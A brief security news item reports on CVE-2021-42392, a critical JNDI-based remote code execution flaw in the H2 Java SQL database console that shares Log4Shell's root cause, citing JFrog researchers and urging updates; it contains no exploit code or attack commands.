New Log4Shell-like vulnerability impacts H2 Java SQL database

Researchers have warned of a new, critical Java flaw impacting the console of the popular H2 Java SQL database with the same root cause as the Log4Shell vulnerability in Apache Log4j. According to JFrog, the issue carries a critical risk of unauthenticated remote code execution (RCE) for certain organizations who should update their H2 databases immediately.

H2 vulnerability root cause similar to Log4Shell, less exploitation scope

Like Log4Shell, the flaw (CVE-2021-42392) relates to Java Naming and Directory Interface (JNDI) remote class loading. An attacker could trigger RCE if they are able to insert a malicious URL into a JNDI lookup, JFrog researchers explained in a blog post.

To read this article in full, please click here